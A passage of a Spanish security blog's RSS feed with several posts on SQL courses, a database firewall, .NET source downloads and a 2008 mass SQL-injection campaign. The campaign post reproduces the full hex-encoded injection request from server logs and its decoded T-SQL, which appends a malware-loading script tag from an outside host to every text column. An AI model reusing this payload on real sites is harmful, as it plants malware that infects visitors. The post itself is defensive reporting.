<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/video-ataque-de-envenamiento-de-cookies-cookie-poisoning.xhtml" title="Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)">Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)</a></li><li><a href="http://www.dragonjar.org/como-detectar-y-prevenir-escalada-de-privilegios-en-gnulinux.xhtml" title="Como detectar  y prevenir escalada de privilegios en GNU/Linux">Como detectar  y prevenir escalada de privilegios en GNU/Linux</a></li><li><a href="http://www.dragonjar.org/memorias-y-videos-del-asegurit-iii.xhtml" title="Memorias y Videos del Asegúr@IT III">Memorias y Videos del Asegúr@IT III</a></li><li><a href="http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml" title="Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas">Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas</a></li><li><a href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a href="http://www.dragonjar.org/systemrescuecd-recupera-tus-datos-despues-de-un-fallo-en-el-sistema.xhtml" title="SystemRescueCD, Recupera tus datos después de un fallo en el sistema">SystemRescueCD, Recupera tus datos después de un fallo en el sistema</a></li><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/multiinjector-herramienta-automatica-de-inyeccion-sql.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cursos Gratuitos de Programacion en el SENA VIRTUAL</title>
		<link>http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml</link>
		<comments>http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml#comments</comments>
		<pubDate>Sat, 20 Dec 2008 17:08:28 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[aplicaciones]]></category>
		<category><![CDATA[Aprendizaje]]></category>
		<category><![CDATA[calidad de software]]></category>
		<category><![CDATA[Curso]]></category>
		<category><![CDATA[Cursos]]></category>
		<category><![CDATA[cursos virtuales]]></category>
		<category><![CDATA[Diseño]]></category>
		<category><![CDATA[excepciones en java]]></category>
		<category><![CDATA[JAVA]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[microsoft access 2000]]></category>
		<category><![CDATA[Nacional]]></category>
		<category><![CDATA[Programación]]></category>
		<category><![CDATA[SENA]]></category>
		<category><![CDATA[senavirtual]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[variables]]></category>
		<category><![CDATA[Virtual]]></category>
		<category><![CDATA[www.senavirtual.edu.co]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=1672</guid>
		<description><![CDATA[
El SENA (Servicio Nacional de Aprendizaje), en su página  www.senavirtual.edu.co está implementando nuevos cursos virtuales sobre programación, entre las temáticas encontramos lenguajes como JAVA, C++, modelado de datos y calidad de software.
Recordemos que al terminar los cursos en el sena virtual te dan un certificado del sena y entras automáticamente en la bolsa de [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://img355.imageshack.us/img355/6241/sinttulo2cz9.jpg" alt="Cursos SenaVirtual Gratis Programacion" title="Cursos Gratuitos de Programacion en el SENA VIRTUAL" /></p>
<p>El SENA (Servicio Nacional de Aprendizaje), en su página  www.senavirtual.edu.co está implementando nuevos cursos virtuales sobre programación, entre las temáticas encontramos lenguajes como JAVA, C++, modelado de datos y calidad de software.</p>
<p>Recordemos que al terminar los cursos en el sena virtual te dan un certificado del sena y entras automáticamente en la bolsa de empleo del SENA donde podrás ser llamado para trabajar en prestigiosas empresas del sector tecnológico del país.</p>
<p>El listado de cursos que puedes realizar en el senavirtual sobre programación es el siguiente:<br />
<span id="more-1672"></span></p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-5474472965666825";
/* DJAR - Sena Enlaces */
google_ad_slot = "3038482239";
google_ad_width = 200;
google_ad_height = 90;
// --></script><br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script></p>
<p><strong><span style="text-decoration: underline;"><span style="color: #000000;">Programación Orientada A Objetos</span></span></strong></p>
<p><span style="color: #0000ff;"> Variables y estructuras de Control en la Programación orientada a objetos: Java<br />
Desarrollo de aplicaciones con Interfaz Gráfica, Manejo de Eventos, Clases y Objetos : Java<br />
Desarrollo de Aplicaciones con Manejo de Datos en la Memoria- Java<br />
Desarrollo de Aplicaciones con Manejo de Archivos de Texto y el Manejo de Excepciones en JAVA<br />
Desarrollo de Aplicaciones con Manejo de Proceso Simultaneo y Uso de Menús: Java<br />
Desarrollo de Applets/Aplicaciones con Uso de Base de Datos, Redes, Servlets y Multimedia<br />
Estructura del Lenguaje de Programación c++ ( Nivel I)<br />
Módulos, estructura de almacenamiento y POO utilizando el lenguaje de programación C++ ( Nivel II)<br />
Uso de clases, objetos, métodos y archivos secuenciales en POO con lenguaje de programación C++ ( Nivel III)<br />
</span><br />
<script type="text/javascript"><!--
google_ad_client = "pub-5474472965666825";
/* DJAR - Sena Enlaces */
google_ad_slot = "3038482239";
google_ad_width = 200;
google_ad_height = 90;
// --></script><br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script></p>
<p><strong><span style="text-decoration: underline;"><span style="color: #000000;">Modelado De Datos</span></span></strong></p>
<p><span style="color: #0000ff;"> Informática: Administración de bases de datos utilizando Microsoft® Access 2000<br />
Informática: Diseño de bases de datos en SQL<br />
Metodología de la Programación de Sistemas Informáticos<br />
Estructuras de datos Lineales<br />
Estructuras de datos No Lineales<br />
Modelación de Sistemas &#8211; Modelación<br />
Modelación de Sistemas &#8211; Simulación<br />
Base de datos: Conceptuación y sistemas de Administración<br />
Diseño de Casos de Uso<br />
Metodologías de Análisis y Diseño de Sistemas-de la incepción al diseño de la arquitectura<br />
Metodologías de Análisis y Diseño de Sistemas-del diseño a la implementación<br />
Principios del análisis y diseño orientado a objetos, utilizando el estándar UML<br />
Aplicación metodología orientada a objetos utilizando el estándar UML</span></p>
<p><span style="color: #0000ff;">Para acceder a estos cursos gratuitos del SENA solo tienes que entrar al <a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://sis.senavirtual.edu.co/oferta.php?areaid=10">enlace del sena virtual.</a></span></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/cursos-gratis-de-informatica-en-el-sena-virtual.xhtml" title="Cursos Gratis de Informática en el Sena Virtual">Cursos Gratis de Informática en el Sena Virtual</a></li><li><a href="http://www.dragonjar.org/cursos-virtuales-gratis-en-el-sena.xhtml" title="Sena Virtual &#8211; Cursos virtuales GRATIS en el Sena">Sena Virtual &#8211; Cursos virtuales GRATIS en el Sena</a></li><li><a href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li><li><a href="http://www.dragonjar.org/curso-en-el-sena-virtual-sobre-auditoria-en-seguridad.xhtml" title="Curso en el Sena Virtual sobre Auditoria en Seguridad">Curso en el Sena Virtual sobre Auditoria en Seguridad</a></li><li><a href="http://www.dragonjar.org/codigo-fuente-para-sistemas-de-matriculas-ventas-biblioteca-odontologia-administracion-de-autos-en-net.xhtml" title="Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET ">Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET </a></li><li><a href="http://www.dragonjar.org/crackear-aplicacion-java-jnlp.xhtml" title="Ingeniería Inversa en Aplicación JAVA y JNLP">Ingeniería Inversa en Aplicación JAVA y JNLP</a></li><li><a href="http://www.dragonjar.org/process-hacker-mata-procesos-en-windows.xhtml" title="Process Hacker, Mata Procesos en Windows">Process Hacker, Mata Procesos en Windows</a></li><li><a href="http://www.dragonjar.org/curso-de-dibujo-vectorial-con-draw.xhtml" title="Curso de Dibujo Vectorial con OpenOffice Draw">Curso de Dibujo Vectorial con OpenOffice Draw</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas</title>
		<link>http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml</link>
		<comments>http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml#comments</comments>
		<pubDate>Wed, 13 Aug 2008 12:35:21 +0000</pubDate>
		<dc:creator>arpunk</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=201</guid>
		<description><![CDATA[
Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web.
Las tablas de sysobjects y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://img214.imageshack.us/img214/7079/5180537378a9794389erq7.jpg" alt="Inyeccion SQL - SQL Injection" title="Nuevo ataque de Inyeccion de SQL esta comprometiendo maquinas" /></p>
<p>Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web.</p>
<p>Las tablas de sysobjects y syscolumns son consultadas y esto nos da una muy buena pista: las maquinas que se están atacando corren MSSQL, y se esta guardando código HTML dentro de la base de datos. También es posible que los servidores web con Sybase database backends sean explotables, ya que Sybase utiliza de manera muy amplia la misma sintaxis y estructura de las tablas que MSSQL server.<span id="more-201"></span></p>
<p>La sentencia SQL escanea todas las tablas de la base de datos, insertando el código HTML del atacante en cada una de las paginas. Esto causa que el servidor web envié a los visitantes, dependiendo de su cliente web, a diferentes formas de malware que se aloja en paginas referenciadas<br />
por el código HTML maligno. Similar al phishing, este ataque toma ventaja de que el visitante del sitio web confía en el sitio que están visitando. En vez de suplantar la identidad del sitio confiado, el sitio confiado es aquel que le envía el malware al cliente, quien tiene mayores probabilidades de aceptar.</p>
<p>Este tipo de ataque puede ser usado para lanzar ataques de phishing tradicionales en sitios que solicitan información financiera, o cualquier otro tipo de ataque en donde la confianza de los visitantes pueda ser explotada.</p>
<p>Los requests que saldrían en los logs del web server se asemejan al siguiente:</p>
<p>GET /?&#8217;;DECLARE%20@S%20CHAR(4000);SET%20@<br />
S=CAST(0&#215;4445434C41524520405420766172636<br />
8617228323535292C40432076617263686172283<br />
430303029204445434C415245205461626C655F4<br />
37572736F7220435552534F5220464F522073656<br />
C65637420612E6E616D652C622E6E616D6520667<br />
26F6D207379736F626A6563747320612C7379736<br />
36F6C756D6E73206220776865726520612E69643<br />
D622E696420616E6420612E78747970653D27752<br />
720616E642028622E78747970653D3939206F722<br />
0622E78747970653D3335206F7220622E7874797<br />
0653D323331206F7220622E78747970653D31363<br />
729204F50454E205461626C655F437572736F722<br />
04645544348204E4558542046524F4D202054616<br />
26C655F437572736F7220494E544F2040542C404<br />
3205748494C4528404046455443485F535441545<br />
5533D302920424547494E2065786563282775706<br />
4617465205B272B40542B275D20736574205B272<br />
B40432B275D3D5B272B40432B275D2B2727223E3<br />
C2F7469746C653E3C736372697074207372633D2<br />
2687474703A2F2F73646F2E313030306D672E636<br />
E2F63737273732F772E6A73223E3C2F736372697<br />
0743E3C212D2D272720776865726520272B40432<br />
B27206E6F74206C696B6520272725223E3C2F746<br />
9746C653E3C736372697074207372633D2268747<br />
4703A2F2F73646F2E313030306D672E636E2F637<br />
37273732F772E6A73223E3C2F7363726970743E3<br />
C212D2D272727294645544348204E45585420465<br />
24F4D20205461626C655F437572736F7220494E5<br />
44F2040542C404320454E4420434C4F534520546<br />
1626C655F437572736F72204445414C4C4F43415<br />
445205461626C655F437572736F72%20AS%20CHA<br />
R(4000));EXEC(@S);HTTP/1.1</p>
<p>Esta salida decodificada nos muestra la siguiente sentencia SQL (URLs han sido removidas):</p>
<p>DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””&gt;<script src="”http://www.domain.com/malware/"></script><!--–” where ‘+@C+’ not like ”%”--><script src="”http://www.domain.com/malware/w.js"></script><!--–”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor</p-->
<p>Este ataque todavía sigue en funcionamiento hasta el día de hoy. Se ha obtenido evidencia de explotación satisfactoria a través de cientos de paginas web. Estas paginas estaban asociadas con otras paginas al rededor del mundo suplantando contenido (incluyendo sitios de gobierno, sitios de venta por Internet, sitios de información financiera, entre otros).</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/multiinjector-herramienta-automatica-de-inyeccion-sql.xhtml" title="MultiInjector &#8211; Herramienta Automática de Inyección SQL">MultiInjector &#8211; Herramienta Automática de Inyección SQL</a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li><li><a href="http://www.dragonjar.org/memorias-expodefensa-2009.xhtml" title="Memorias ExpoDefensa 2009">Memorias ExpoDefensa 2009</a></li><li><a href="http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml" title="Código Fuente Herramienta para SQL Injection  ">Código Fuente Herramienta para SQL Injection  </a></li><li><a href="http://www.dragonjar.org/memorias-y-videos-del-asegurit-iii.xhtml" title="Memorias y Videos del Asegúr@IT III">Memorias y Videos del Asegúr@IT III</a></li><li><a href="http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml" title="Cursos Gratuitos de Programacion en el SENA VIRTUAL">Cursos Gratuitos de Programacion en el SENA VIRTUAL</a></li><li><a href="http://www.dragonjar.org/greensql-firewall-de-codigo-abierto-para-bases-de-datos.xhtml" title="GreenSQL, Firewall de código abierto para Bases de Datos ">GreenSQL, Firewall de código abierto para Bases de Datos </a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/nuevo-ataque-de-inyeccion-de-sql-esta-comprometiendo-maquinas.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>GreenSQL, Firewall de código abierto para Bases de Datos</title>
		<link>http://www.dragonjar.org/greensql-firewall-de-codigo-abierto-para-bases-de-datos.xhtml</link>
		<comments>http://www.dragonjar.org/greensql-firewall-de-codigo-abierto-para-bases-de-datos.xhtml#comments</comments>
		<pubDate>Wed, 02 Apr 2008 01:36:43 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Bases de Datos]]></category>
		<category><![CDATA[Firewall]]></category>
		<category><![CDATA[GreenSQL]]></category>
		<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=305</guid>
		<description><![CDATA[GreenSQL es un cortafuegos diseñado para brindar protección a Bases de Datos, especificamente MySQL frente a ataques del tipo SQL injection. GreenSQL trabaja en modo proxy interviniendo las conexiones a la base de datos y evaluando los comandos SQL que se envían.

Lo que hace la herramienta es evaluar los comandos SQL recibidos, basandose en una [...]]]></description>
			<content:encoded><![CDATA[<p>GreenSQL es un cortafuegos diseñado para brindar protección a Bases de Datos, especificamente MySQL frente a ataques del tipo SQL injection. GreenSQL trabaja en modo proxy interviniendo las conexiones a la base de datos y evaluando los comandos SQL que se envían.</p>
<p style="text-align: center;"><img src="http://img150.imageshack.us/img150/8280/logo1wr5.gif" alt="logo1wr5 GreenSQL, Firewall de código abierto para Bases de Datos " width="100" height="65" title="GreenSQL, Firewall de código abierto para Bases de Datos " /></p>
<p>Lo que hace la herramienta es evaluar los comandos SQL recibidos, basandose en una lista que podemos definir como sentencias peligrosas para la integridad de nuestra aplicación Web y base de datos, como por ejemplo: DROP, CREATE, ALTER, INSERT, etc.<span id="more-305"></span></p>
<p>Además de sus prestaciones la herramienta es distribuida bajo licencia GPL.</p>
<p>GreenSQL cumple su función de Firewall bloqueando inyecciones de comandos utilizados para tareas administrativas de bases de datos. Además calcula el riesgo de cada consulta SQL bloqueando las consultas que comprometan la seguridad del aplicativo Web o base de datos.</p>
<p>La página Web oficial del proyecto ha habilitado una sección demostrativa de la herramienta, en la cual podemos observar la efectividad del cortafuegos. Para acceder al demo solo debemos ingresar a la siguiente <a rel="nofollow" target="_blank" href="http://demo.greensql.net/" target="_blank">URL</a>.</p>
<p><a rel="nofollow" target="_blank" href="http://www.greensql.net/about" target="_blank">Más información de GreenSQL</a><br />
<a rel="nofollow" target="_blank" href="http://sourceforge.net/project/showfiles.php?group_id=199511" target="_blank">Descargar GreenSQL</a><br />
<a rel="nofollow" target="_blank" href="http://www.greensql.net/howto" target="_blank">Documentación de GreenSQL</a><br />
<a rel="nofollow" target="_blank" href="http://demo.greensql.net/login.php" target="_blank">Demo de GreenSQL</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li><li><a href="http://www.dragonjar.org/firewalls-diseo-panormica-actual.xhtml" title="FIREWALLS &#8211; Diseño y Panorámica Actual">FIREWALLS &#8211; Diseño y Panorámica Actual</a></li><li><a href="http://www.dragonjar.org/nuevo-gusano-infecta-routers-modems-y-sistemas-gnu-linux.xhtml" title="Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux">Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux</a></li><li><a href="http://www.dragonjar.org/video-tutorial-de-iptables.xhtml" title="Vídeo Tutorial de IPTables">Vídeo Tutorial de IPTables</a></li><li><a href="http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml" title="Código Fuente Herramienta para SQL Injection  ">Código Fuente Herramienta para SQL Injection  </a></li><li><a href="http://www.dragonjar.org/multiinjector-herramienta-automatica-de-inyeccion-sql.xhtml" title="MultiInjector &#8211; Herramienta Automática de Inyección SQL">MultiInjector &#8211; Herramienta Automática de Inyección SQL</a></li><li><a href="http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml" title="Cursos Gratuitos de Programacion en el SENA VIRTUAL">Cursos Gratuitos de Programacion en el SENA VIRTUAL</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/greensql-firewall-de-codigo-abierto-para-bases-de-datos.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET</title>
		<link>http://www.dragonjar.org/codigo-fuente-para-sistemas-de-matriculas-ventas-biblioteca-odontologia-administracion-de-autos-en-net.xhtml</link>
		<comments>http://www.dragonjar.org/codigo-fuente-para-sistemas-de-matriculas-ventas-biblioteca-odontologia-administracion-de-autos-en-net.xhtml#comments</comments>
		<pubDate>Mon, 01 Oct 2007 14:48:36 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[.NET]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Programación]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[VisualBasic]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=157</guid>
		<description><![CDATA[Aquí les dejo Varios Códigos fuente escritos en .NET para crear un Sistema de Matriculas (VB.NET y SQLServer), Sistema Ventas, Sistema Biblioteca, Sistema Odontología, Sistema Administración de Autos.

Sistema de Matriculas
Sistema de ventas
Sistema de Biblioteca
Sistema de Odontología
Sistema de Administración de Autos
También puede interesarte...Cursos Gratuitos de Programacion en el SENA VIRTUALCódigo Fuente Herramienta para SQL Injection  [...]]]></description>
			<content:encoded><![CDATA[<p>Aquí les dejo Varios Códigos fuente escritos en .NET para crear un Sistema de Matriculas (VB.NET y SQLServer), Sistema Ventas, Sistema Biblioteca, Sistema Odontología, Sistema Administración de Autos.</p>
<p style="text-align: center;"><img src="http://img223.imageshack.us/img223/3176/dotnetlogoju8.jpg" border="0" alt="dotnetlogoju8 Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET "  title="Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET " /></p>
<p><a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.4shared.com/file/68133093/72f829fd/Sistema_Matriculas.html" target="_blank">Sistema de Matriculas</a></p>
<p><a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.4shared.com/file/68132639/d4f333be/Sistema_de_Ventas.html" target="_blank">Sistema de ventas</a></p>
<p><a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.4shared.com/file/68131874/d60508e3/Sistema_de_Biblioteca.html" target="_blank">Sistema de Biblioteca</a></p>
<p><a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.4shared.com/file/29143292/9666145b/CAETCOS.html" target="_blank">Sistema de Odontología</a></p>
<p><a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.4shared.com/file/29092487/70eadd56/Sistema_SudamericaCAR.html" target="_blank">Sistema de Administración de Autos</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml" title="Cursos Gratuitos de Programacion en el SENA VIRTUAL">Cursos Gratuitos de Programacion en el SENA VIRTUAL</a></li><li><a href="http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml" title="Código Fuente Herramienta para SQL Injection  ">Código Fuente Herramienta para SQL Injection  </a></li><li><a href="http://www.dragonjar.org/asi-fue-el-technet-security-day-de-microsoft-en-barcelona.xhtml" title="Así fué el Technet Security Day de Microsoft en Barcelona">Así fué el Technet Security Day de Microsoft en Barcelona</a></li><li><a href="http://www.dragonjar.org/microsoft-esta-regalando-hardware.xhtml" title="Microsoft esta Regalando Hardware">Microsoft esta Regalando Hardware</a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/la-anti-tesis-del-cofee.xhtml" title="Herramienta Anti Forense para Windows">Herramienta Anti Forense para Windows</a></li><li><a href="http://www.dragonjar.org/crackear-aplicacion-java-jnlp.xhtml" title="Ingeniería Inversa en Aplicación JAVA y JNLP">Ingeniería Inversa en Aplicación JAVA y JNLP</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/codigo-fuente-para-sistemas-de-matriculas-ventas-biblioteca-odontologia-administracion-de-autos-en-net.xhtml/feed</wfw:commentRss>
		<slash:comments>87</slash:comments>
		</item>
		<item>
		<title>Nueva Clase de Vulnerabilidad en Bases de Datos SQL</title>
		<link>http://www.dragonjar.org/nueva-clase-de-vulnerabilidad-en-bases-de-datos-sql.xhtml</link>
		<comments>http://www.dragonjar.org/nueva-clase-de-vulnerabilidad-en-bases-de-datos-sql.xhtml#comments</comments>
		<pubDate>Thu, 16 Aug 2007 20:03:26 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Base de Datos]]></category>
		<category><![CDATA[MS SQL]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=899</guid>
		<description><![CDATA[Martin McKeay e Ivan Arce, CTO de Core Security  hablan en este video de una nueva clase de vulnerabilidad en SQL que depende de un algoritmo común en la mayoría de las bases de datos SQL (MySQL, MS SQL, ect…). Esto seguido de una charla que dio Ivan en el Black Hat describiendo la naturaleza [...]]]></description>
			<content:encoded><![CDATA[<p><a rel="nofollow" target="_blank" href="http://www.mckeay.net/" target="_blank"><span style="text-decoration: underline;">Martin McKeay</span></a> e Ivan Arce, CTO de Core Security  hablan en este video de una nueva clase de vulnerabilidad en SQL que depende de un algoritmo común en la mayoría de las bases de datos SQL (MySQL, MS SQL, ect…). Esto seguido de una charla que dio Ivan en el Black Hat describiendo la naturaleza de esta vulnerabilidad y como podría usarse en el futuro.<span id="more-899"></span></p>
<p align="center"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="320" height="269" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="flashvars" value="content=http://media1.podtech.net/media/2007/08/PID_012225/Podtech_Security_Show_BlackHat_Ivan_Ar.flv&amp;totalTime=507000&amp;permalink=http://www.podtech.net/home/3882/black-hat-2007-ivan-arce-core-security&amp;breadcrumb=f56976969be043db8a52b8ca5b901e33" /><param name="src" value="http://www.podtech.net/player/podtech-player.swf?bc=f56976969be043db8a52b8ca5b901e33" /><param name="wmode" value="transparent" /><embed type="application/x-shockwave-flash" width="320" height="269" src="http://www.podtech.net/player/podtech-player.swf?bc=f56976969be043db8a52b8ca5b901e33" wmode="transparent" flashvars="content=http://media1.podtech.net/media/2007/08/PID_012225/Podtech_Security_Show_BlackHat_Ivan_Ar.flv&amp;totalTime=507000&amp;permalink=http://www.podtech.net/home/3882/black-hat-2007-ivan-arce-core-security&amp;breadcrumb=f56976969be043db8a52b8ca5b901e33"></embed></object></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li><li><a href="http://www.dragonjar.org/sqlmap-herramienta-automatica-de-inyeccion-sql.xhtml" title="SQLMap &#8211; Herramienta Automática de Inyección SQL">SQLMap &#8211; Herramienta Automática de Inyección SQL</a></li><li><a href="http://www.dragonjar.org/lista-de-scanners-para-sql-injection.xhtml" title="Lista de Scanners para SQL Injection. ">Lista de Scanners para SQL Injection. </a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/nueva-clase-de-vulnerabilidad-en-bases-de-datos-sql.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Manual de SQL (Structured Query Language)</title>
		<link>http://www.dragonjar.org/manual-de-sql-structured-query-language.xhtml</link>
		<comments>http://www.dragonjar.org/manual-de-sql-structured-query-language.xhtml#comments</comments>
		<pubDate>Sun, 17 Jun 2007 01:02:34 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[manual]]></category>
		<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=989</guid>
		<description><![CDATA[



